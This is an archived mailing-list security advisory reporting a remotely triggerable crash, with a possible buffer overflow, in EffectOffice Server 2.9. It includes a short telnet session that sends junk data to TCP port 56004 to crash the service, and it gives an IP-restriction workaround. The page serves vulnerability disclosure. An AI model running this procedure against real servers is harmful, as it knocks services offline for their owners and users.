lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <04ac01c3af6e$2fa965c0$1864640a@rdis.ru>
From: antipov at SecurityLab.ru (Alexander Antipov)
Subject: [securitylab.ru] EffectOffice Server 2.9 problem

Application: EffectOffice Server 2.9
Vendor: EffectOffice
Vendor Site: http://www.EffectOffice.com
Remote: Yes
Exploitable: Yes
Risk level: High 
Authors: D_BuG (d_bug @ bk.ru)
Authors Site: http://www.securitylab.ru 

Description: 
A vulnerability identified in EffectOffice can be exploited by a
malicious person to cause a Denial of Service and under specific
condition can lead to buffer overflow with possibility of remote code
execution.

Remote user could send a specially crafted data to 56004 TCP port on
target server to potentially cause the system to crash. 


Exploit:
 
hacker# telnet
telnet> open
(to) attackhost 56004
Trying attackhost......
Connected to attackhost.
Escape character is '^]'.
aaaaaaaaaa
aaaaaaaaaa
aaaaaaaaaa
aaaaaaaaaa
^]
telnet>close
telnet>quit
hacker#

Crash service


Workaround: Restrict access to the service allowing only connection
attempts from trusted IPs if possible.




Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ